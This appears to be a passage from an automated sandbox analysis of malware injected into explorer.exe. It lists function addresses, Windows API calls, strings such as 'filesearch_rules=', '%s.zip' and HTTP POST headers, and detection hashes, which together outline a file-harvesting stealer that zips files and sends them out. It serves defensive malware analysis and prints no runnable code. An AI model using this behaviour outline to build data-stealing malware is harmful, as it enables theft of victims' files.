8936->8935 8937->8920

                            Executed Functions

                            Function 003A1EBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26nativeCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003A1210: VirtualQuery.KERNEL32(?,?,0000001C), ref: 003A121D
                            • RtlMoveMemory.NTDLL(00000000,00000001,00000363), ref: 003A1EE2
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000001), ref: 003A1EEB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                            • String ID: `,w
                            • API String ID: 1675517319-1086758147
                            • Opcode ID: 87918958cff38c625818d75a3c4941ac03c8e5bc6c1189bfc24e83617e07db50
                            • Instruction ID: 789deb64421f659cea874571c0839bf353f70994aab6b4a4b53ec1de4c594ea0
                            • Opcode Fuzzy Hash: 87918958cff38c625818d75a3c4941ac03c8e5bc6c1189bfc24e83617e07db50
                            • Instruction Fuzzy Hash: 03E0D8314112106BC657B734EC0DE5B379CEF533A9F108B15F6658E0A1CB308940C250
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A1D43 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 114sleepstringCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            • wsprintfA.USER32 ref: 003A1D7C
                              • Part of subcall function 003A11D1: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 003A11DB
                              • Part of subcall function 003A11D1: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000001,003A1D90), ref: 003A11ED
                            • RtlMoveMemory.NTDLL(00000000,00000010,-00000001), ref: 003A1DE5
                            • lstrlen.KERNEL32(00000000), ref: 003A1DEC
                            • RtlZeroMemory.NTDLL(00000000,00000104), ref: 003A1E24
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003A1E3C
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003A1E64
                              • Part of subcall function 003A12B6: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,003A1E71), ref: 003A12E5
                              • Part of subcall function 003A12B6: RtlMoveMemory.NTDLL(0077627C,00000000,00000000), ref: 003A12EE
                            • RtlZeroMemory.NTDLL(00040744), ref: 003A1EA4
                            • Sleep.KERNELBASE(000927C0), ref: 003A1EAF
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$Move$FileHeapZerolstrlen$AllocateMappingOpenProcessSleepViewwsprintf
                            • String ID: %s%s$`,w$filesearch_rules=$|:|
                            • API String ID: 893542245-3597873117
                            • Opcode ID: f856670c48acdde524d1cb60d2c7eb5503126db49fe7edad1542bdacbec501be
                            • Instruction ID: ea02809a44a9b783a27b3c28476a2d6ac29eb86aa34c190e3732d470ad477e10
                            • Opcode Fuzzy Hash: f856670c48acdde524d1cb60d2c7eb5503126db49fe7edad1542bdacbec501be
                            • Instruction Fuzzy Hash: 8A3191706047019FD307FF289C89E7E77AEEB86358F010B18FA129B296DFB49D458691
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003C59A9 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 315COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 39 3c59a9-3c59c6 40 3c59c7-3c59ee 39->40 41 3c59f0-3c59fb 40->41 43 3c59fc-3c5a03 41->43 44 3c5a04-3c5a06 43->44 45 3c5a08-3c5a0a 44->45 46 3c5a07 44->46 47 3c5a0b-3c5a15 45->47 46->45 47->44 48 3c5a17 47->48 48->40 49 3c5a19-3c5a54 48->49 49->47 51 3c5a56 49->51 52 3c5a6c 51->52 53 3c5a58 51->53 52->43 55 3c5a6d-3c5a6f 52->55 53->41 54 3c5a5b-3c5a66 53->54 54->52 56 3c5abc-3c5ac8 55->56 57 3c5a71-3c5a74 55->57 60 3c5ada-3c5adf 56->60 58 3c5a76-3c5a7a 57->58 59 3c5af2 57->59 62 3c5a7c-3c5aae 58->62 63 3c5ab0-3c5ab5 58->63 61 3c5af3-3c5af7 59->61 64 3c5ae1 60->64 65 3c5ae8-3c5aea 61->65 66 3c5af9 61->66 62->63 67 3c5c7d 63->67 68 3c5abb 63->68 69 3c5ad0-3c5ad5 64->69 70 3c5ae3 64->70 65->61 74 3c5aec-3c5af1 65->74 71 3c5afb-3c5b02 66->71 72 3c5b04-3c5b09 66->72 67->67 68->56 73 3c5ad6-3c5ad8 69->73 70->65 71->65 71->72 75 3c5b18-3c5b1a 72->75 76 3c5b0b-3c5b14 72->76 73->60 73->64 74->59 79 3c5b1c-3c5b21 75->79 80 3c5b23-3c5b27 75->80 77 3c5b8a-3c5b8d 76->77 78 3c5b16 76->78 81 3c5b92-3c5b95 77->81 78->75 79->80 82 3c5b29-3c5b2e 80->82 83 3c5b30-3c5b32 80->83 84 3c5b97-3c5b99 81->84 82->83 85 3c5b54-3c5b63 83->85 86 3c5b34 83->86 84->81 89 3c5b9b-3c5b9e 84->89 87 3c5b74-3c5b81 85->87 88 3c5b65-3c5b6c 85->88 90 3c5b35-3c5b37 86->90 87->87 92 3c5b83-3c5b85 87->92 88->88 91 3c5b6e 88->91 89->81 93 3c5ba0-3c5bbc 89->93 94 3c5b39-3c5b3e 90->94 95 3c5b40-3c5b44 90->95 91->73 92->73 93->84 97 3c5bbe 93->97 94->95 95->90 96 3c5b46 95->96 98 3c5b48-3c5b4f 96->98 99 3c5b51 96->99 100 3c5bc4-3c5bc8 97->100 98->90 98->99 99->85 101 3c5c0f-3c5c12 100->101 102 3c5bca-3c5be0 100->102 103 3c5c15-3c5c1c 101->103 108 3c5be1-3c5be6 102->108 105 3c5c1e-3c5c20 103->105 106 3c5c40-3c5c70 VirtualProtect * 2 103->106 109 3c5c22-3c5c31 105->109 110 3c5c33-3c5c3e 105->110 107 3c5c74-3c5c78 106->107 107->107 111 3c5c7a 107->111 108->100 112 3c5be8-3c5bea 108->112 109->103 110->109 111->67 113 3c5bec-3c5bf2 112->113 114 3c5bf3-3c5c00 112->114 113->114 116 3c5c09-3c5c0c 114->116 117 3c5c02-3c5c07 114->117 117->108
                            Strings
                            • he CRT more than once.This indicates a bug in your application., xrefs: 003C5ABC
                            Memory Dump Source
                            • Source File: 0000000E.00000002.508709098.00000000003C3000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C3000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3c3000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: he CRT more than once.This indicates a bug in your application.
                            • API String ID: 0-295583550
                            • Opcode ID: 05785816162738bc705982e96bac6a522005c72bac943122fed93a8132833492
                            • Instruction ID: ddec28051146247b93e172e71f6680a85ac930bd851c76ea9b305e2aedfc87d0
                            • Opcode Fuzzy Hash: 05785816162738bc705982e96bac6a522005c72bac943122fed93a8132833492
                            • Instruction Fuzzy Hash: 66A18F71518B924FD7275A788C90BA0BFA4EF53324B2907ADC4E1CB2D7D7A06C86C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003AAAB2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 118 3aaab2-3aaabd 119 3aaabf-3aaac4 118->119 120 3aaac6-3aaac8 118->120 121 3aaacc 119->121 122 3aaaca 120->122 123 3aaad1-3aaad4 call 3a8d51 120->123 121->123 122->121 125 3aaad9-3aaae2 123->125 126 3aab02-3aab04 125->126 127 3aaae4-3aaafb call 3a8d51 125->127 128 3aab09-3aab18 126->128 127->126 133 3aaafd-3aab01 127->133 130 3aab1a-3aab1f 128->130 131 3aab21-3aab24 128->131 130->128
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: __calloc_crt
                            • String ID: `;
                            • API String ID: 3494438863-4285419970
                            • Opcode ID: 78b0300a46112b33c32aa4d608218cf33324dd9b9c8ed21734510d76354d13d7
                            • Instruction ID: fba6c1a575883c7866ebfc7814b8c783d5b6d8f4cd1665b2a04c4b1003914a8d
                            • Opcode Fuzzy Hash: 78b0300a46112b33c32aa4d608218cf33324dd9b9c8ed21734510d76354d13d7
                            • Instruction Fuzzy Hash: 23F0CD72608B01AEF71B9F68BD02AB537D9E717728F20523BE700CE1A0EB308C40D691
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A11D1 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 147 3a11d1-3a11e3 OpenFileMappingA 148 3a11f8-3a11fc 147->148 149 3a11e5-3a11f5 MapViewOfFile 147->149 149->148
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 003A11DB
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000001,003A1D90), ref: 003A11ED
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: f4a5be54860a7a0ec89f98cc08bb1a9ab3df14a0f83ae3a841de3d3a8300684b
                            • Instruction ID: 04bc9b28bb716e1b25774f0c2446ca68e808128d90360c8caa62f05d818130e0
                            • Opcode Fuzzy Hash: f4a5be54860a7a0ec89f98cc08bb1a9ab3df14a0f83ae3a841de3d3a8300684b
                            • Instruction Fuzzy Hash: D8D0173270A2317BE7311A6A6C0CF836EDDDF86BE1F050125B609D2050D6608800C2F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A11FD Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 150 3a11fd-3a120f UnmapViewOfFile FindCloseChangeNotification
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,00000001,003A1E99,00000001), ref: 003A1201
                            • FindCloseChangeNotification.KERNELBASE(?), ref: 003A1208
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: 48a01234d4aa09e8453bfc458ac91d9be6de031ed54675aab4f8b038704bbd94
                            • Instruction ID: ada83a1e02f7e7d6e658f5c18bff94d1fd0cf57d76b298a7593bd1d83cee1a31
                            • Opcode Fuzzy Hash: 48a01234d4aa09e8453bfc458ac91d9be6de031ed54675aab4f8b038704bbd94
                            • Instruction Fuzzy Hash: E8B01272005830D787163FA87C4CACF3F1CEF4A3297018340F209812104734080187F4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A1000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 151 3a1000-3a1010 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: 5cabf05acae98290c7fe86457985137e03243b5c4eadb5cdd62ba36f746b8a70
                            • Instruction ID: 0cb03e2673e3cb8003762dba8e682c869f487883e4f9475d52618aaff1a5ba0d
                            • Opcode Fuzzy Hash: 5cabf05acae98290c7fe86457985137e03243b5c4eadb5cdd62ba36f746b8a70
                            • Instruction Fuzzy Hash: B0A002715505006BDD466BE8AD1DB19371CBB55709F504644B345851509A7455048721
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 003A1B5B Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 161filestringthreadCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003A1090: lstrlen.KERNEL32(?,00000000,?,?,?,003A1AC9), ref: 003A109D
                              • Part of subcall function 003A1090: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,?), ref: 003A10BA
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            • GetTempPathW.KERNEL32(00000104,00000000,00000000,00000000,00000000), ref: 003A1B8F
                            • lstrcatW.KERNEL32 ref: 003A1BA1
                              • Part of subcall function 003A185D: RtlZeroMemory.NTDLL(?,0000001E), ref: 003A1874
                              • Part of subcall function 003A185D: lstrlenW.KERNEL32(00000000), ref: 003A1882
                              • Part of subcall function 003A185D: SHFileOperationW.SHELL32(?), ref: 003A189E
                            • CreateDirectoryW.KERNEL32(00000000), ref: 003A1BB5
                            • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 003A1BCA
                            • GetDriveTypeW.KERNEL32(00000000,00000000), ref: 003A1BE0
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 003A1C01
                            • CreateThread.KERNEL32(00000000,00000000,003A1B37,00000000,00000000,00000000), ref: 003A1C17
                            • lstrlenW.KERNEL32(00000000), ref: 003A1C23
                            • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 003A1C3E
                            • CloseHandle.KERNEL32(?), ref: 003A1C52
                            • wsprintfW.USER32 ref: 003A1C69
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003A1C88
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 003A1C9B
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003A1CCA
                            • CloseHandle.KERNEL32(00000000), ref: 003A1D15
                            • DeleteFileW.KERNEL32(?), ref: 003A1D21
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: File$Createlstrlen$CloseDriveHandleHeaplstrcat$AllocateByteCharDeleteDirectoryLogicalMemoryMultiMultipleObjectsOperationPathProcessReadSizeStringsTempThreadTypeWaitWideZerowsprintf
                            • String ID: %s.zip$`,w
                            • API String ID: 1936918228-1640653526
                            • Opcode ID: 1155b9e7f59d8999b6267fa19639d5f57ee8b8a5ea6ef463cd3eb205b9ab7c86
                            • Instruction ID: a5f429a738d87ec2430843bf35569cf2e62a5bdb5fea5aa3aeed13af5ca34367
                            • Opcode Fuzzy Hash: 1155b9e7f59d8999b6267fa19639d5f57ee8b8a5ea6ef463cd3eb205b9ab7c86
                            • Instruction Fuzzy Hash: 6D51D731500604ABC723BF78EC89F7F7BADEF86759F050629FA12961A1DB358C0187A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A1939 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 150filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            • wsprintfW.USER32 ref: 003A1999
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 003A19A8
                            • lstrcmpiW.KERNEL32 ref: 003A19DE
                            • wsprintfW.USER32 ref: 003A19F4
                            • wsprintfW.USER32 ref: 003A1A39
                            • wsprintfW.USER32 ref: 003A1A4E
                            • RtlZeroMemory.NTDLL(?,00000105), ref: 003A1A79
                            • lstrcat.KERNEL32(?,00000000), ref: 003A1A88
                            • StrToIntA.SHLWAPI(00000000,00000001), ref: 003A1AAF
                            • PathMatchSpecW.SHLWAPI(?,00000000), ref: 003A1AD1
                            • FindNextFileW.KERNEL32(?,?), ref: 003A1B0F
                            • FindClose.KERNEL32(?), ref: 003A1B1E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: wsprintf$Find$FileHeap$AllocateCloseFirstMatchMemoryNextPathProcessSpecZerolstrcatlstrcmpi
                            • String ID: %s\$%s\%s$*.*
                            • API String ID: 1508016061-3943360074
                            • Opcode ID: 9660f01d5aa3f4cca66d4ccf39be2de6dc56073e05f6bd3b320fdb996b9538bb
                            • Instruction ID: 8064d30b85e2884bdbf7ecd33b10acdf58e55015009ec1abe96589a017e8b478
                            • Opcode Fuzzy Hash: 9660f01d5aa3f4cca66d4ccf39be2de6dc56073e05f6bd3b320fdb996b9538bb
                            • Instruction Fuzzy Hash: 4A51F4316043049FD712EF64DC49BAB77EDEF86309F010A18F9559B292EB749C44CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A1936 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 81filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                            • wsprintfW.USER32 ref: 003A1999
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 003A19A8
                            • lstrcmpiW.KERNEL32 ref: 003A19DE
                            • wsprintfW.USER32 ref: 003A19F4
                            • wsprintfW.USER32 ref: 003A1A39
                            • wsprintfW.USER32 ref: 003A1A4E
                            • RtlZeroMemory.NTDLL(?,00000105), ref: 003A1A79
                            • lstrcat.KERNEL32(?,00000000), ref: 003A1A88
                            • StrToIntA.SHLWAPI(00000000,00000001), ref: 003A1AAF
                            • PathMatchSpecW.SHLWAPI(?,00000000), ref: 003A1AD1
                            • FindNextFileW.KERNEL32(?,?), ref: 003A1B0F
                            • FindClose.KERNEL32(?), ref: 003A1B1E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: wsprintf$Find$FileHeap$AllocateCloseFirstMatchMemoryNextPathProcessSpecZerolstrcatlstrcmpi
                            • String ID: %s\%s$*.*
                            • API String ID: 1508016061-3420517325
                            • Opcode ID: d9a2e34e081a45039ff08a1149964c35e7e918d04ae94836bb115c5f359bb7a2
                            • Instruction ID: 5bd5fcc48281e684799225ebce7f9b8de857ebfbb13d056c73ca97421cbd7f8d
                            • Opcode Fuzzy Hash: d9a2e34e081a45039ff08a1149964c35e7e918d04ae94836bb115c5f359bb7a2
                            • Instruction Fuzzy Hash: A121B531605304ABC711AF68DC49AAFBBECEF85319F400B2DF995D7251EB789904CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A1FFD Relevance: 6.0, APIs: 4, Instructions: 31timefileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 003A2012
                            • FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 003A202A
                            • FileTimeToDosDateTime.KERNEL32(?,?), ref: 003A2039
                            • FindClose.KERNEL32(00000000,?,?,?), ref: 003A2040
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: FileTime$Find$CloseDateFirstLocal
                            • String ID:
                            • API String ID: 2659516521-0
                            • Opcode ID: 12fd3a70741e370e9ba081c9a80957e28facb330fb09aa5853bedfa53a1ec55c
                            • Instruction ID: ab228a99a09b165ffccbb8be98088d97a8fef10bce8f1ac060e9c9e1a0f779b6
                            • Opcode Fuzzy Hash: 12fd3a70741e370e9ba081c9a80957e28facb330fb09aa5853bedfa53a1ec55c
                            • Instruction Fuzzy Hash: 94F03777401518BBC711A7A8EC4CEDF77BCDB89325F000766F619D3150EA3496458BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A8D3B Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003A9162,?,?,?,00000001), ref: 003A8D40
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003A8D49
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 0805c7772582da9ecfa7305a81ed094ffed9a654caf4c98452c8b020346ef116
                            • Instruction ID: ded899c7636a35ecaf0a935c7e6abead7405347636d03d51051d043138c26aa0
                            • Opcode Fuzzy Hash: 0805c7772582da9ecfa7305a81ed094ffed9a654caf4c98452c8b020346ef116
                            • Instruction Fuzzy Hash: 3BB09231049608ABCA823B91EC49B883F2EEB0875EF000110F70D480708B6255508AD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A7E6C Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 84COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • RtlDecodePointer.NTDLL ref: 003A7E74
                            • _free.LIBCMT ref: 003A7E8D
                              • Part of subcall function 003A8840: HeapFree.KERNEL32(00000000,00000000,?,003A7C1B,00000000,003A9235,003AAE02,00000001,?,003A1F80,00000001,00000000,00000000,00000000), ref: 003A8854
                              • Part of subcall function 003A8840: GetLastError.KERNEL32(00000000,?,003A7C1B,00000000,003A9235,003AAE02,00000001,?,003A1F80,00000001,00000000,00000000,00000000), ref: 003A8866
                            • _free.LIBCMT ref: 003A7EA0
                            • _free.LIBCMT ref: 003A7EBE
                            • _free.LIBCMT ref: 003A7ED0
                            • _free.LIBCMT ref: 003A7EE1
                            • _free.LIBCMT ref: 003A7EEC
                            • _free.LIBCMT ref: 003A7F10
                            • RtlEncodePointer.NTDLL(0075C1C8), ref: 003A7F17
                            • _free.LIBCMT ref: 003A7F2C
                            • _free.LIBCMT ref: 003A7F42
                            • _free.LIBCMT ref: 003A7F6A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                            • String ID: *u
                            • API String ID: 3064303923-2872433927
                            • Opcode ID: 2bdd75ced67165a0147d209b9bc6e141839e91fc79a1c69d2e0fb3ec57bbd1f8
                            • Instruction ID: b52674c63730e5cbb21cc7cfd6f32cee7e64e765f126ffbc7ddbe27da73d13cd
                            • Opcode Fuzzy Hash: 2bdd75ced67165a0147d209b9bc6e141839e91fc79a1c69d2e0fb3ec57bbd1f8
                            • Instruction Fuzzy Hash: BF21B537D092208FC7236F2DFC81956776CF717728B26023AE6049B2A1CF395C408B94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A145B Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 283COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003A1000: GetProcessHeap.KERNEL32(00000008,?,003A129C,?,?,00000001,00000000,?), ref: 003A1003
                              • Part of subcall function 003A1000: RtlAllocateHeap.NTDLL(00000000), ref: 003A100A
                              • Part of subcall function 003A106C: lstrlen.KERNEL32(00772C2E,?,00000000,00000000,003A1497,772D81D0,00772C2E,00000000), ref: 003A1074
                              • Part of subcall function 003A106C: MultiByteToWideChar.KERNEL32(00000000,00000000,00772C2E,00000001,00000000,00000000), ref: 003A1086
                              • Part of subcall function 003A130E: RtlZeroMemory.NTDLL(?,00000018), ref: 003A1320
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 003A14F3
                            • wsprintfW.USER32 ref: 003A162C
                            • wsprintfW.USER32 ref: 003A1697
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 003A1761
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST$`,w
                            • API String ID: 4204651544-3503094735
                            • Opcode ID: 4742364955506f861e513249a2c8fd7397ed25ec32d03623e559f5883d186e69
                            • Instruction ID: d247ac90bc9f75994afd580c77d88b16978e967cf6344aaa3f0c7969e421200c
                            • Opcode Fuzzy Hash: 4742364955506f861e513249a2c8fd7397ed25ec32d03623e559f5883d186e69
                            • Instruction Fuzzy Hash: 43A18A71608300AFD712DF68D884A2FBBEDEB8A344F14092DFA85DB261DA75DD048B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A7D70 Relevance: 15.1, APIs: 10, Instructions: 75COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___crtIsPackagedApp.LIBCMT ref: 003A7D9A
                            • AreFileApisANSI.KERNEL32(?,00000109,00000000,?,003B35B5,00000008,00000000,00000000,?,003B354C,?,?,?,?,00000008,?), ref: 003A7DA3
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000109,00000000,?,003B35B5,00000008,00000000,00000000,?,003B354C), ref: 003A7DBD
                            • GetLastError.KERNEL32(?,003B35B5,00000008,00000000,00000000,?,003B354C,?,?,?,?,00000008,?,00000000,003BBFF0,00000014), ref: 003A7DCA
                            • __dosmaperr.LIBCMT ref: 003A7DD1
                              • Part of subcall function 003A9230: __getptd_noexit.LIBCMT ref: 003A9230
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                            • String ID:
                            • API String ID: 1083238821-0
                            • Opcode ID: 122462f1a86c4e8ccd070631379cd67c98793538ffc3c44517ffaf424468c96d
                            • Instruction ID: ee5b165601171b57c705338c18ebdcc906b4f230334daa7dd88c425ba93999fa
                            • Opcode Fuzzy Hash: 122462f1a86c4e8ccd070631379cd67c98793538ffc3c44517ffaf424468c96d
                            • Instruction Fuzzy Hash: 2511C472608216BFEB137FB09C85FBA77ACEF26365F214A25F951D9191EA30CC4046A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A204C Relevance: 13.6, APIs: 9, Instructions: 109fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003A1FA2: PathCombineW.SHLWAPI(?,?,?), ref: 003A1FC4
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003A2092
                            • CloseHandle.KERNEL32(00000000), ref: 003A209E
                            • _memset.LIBCMT ref: 003A20B8
                              • Part of subcall function 003A1FFD: FindFirstFileW.KERNEL32(?,?), ref: 003A2012
                              • Part of subcall function 003A1FFD: FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 003A202A
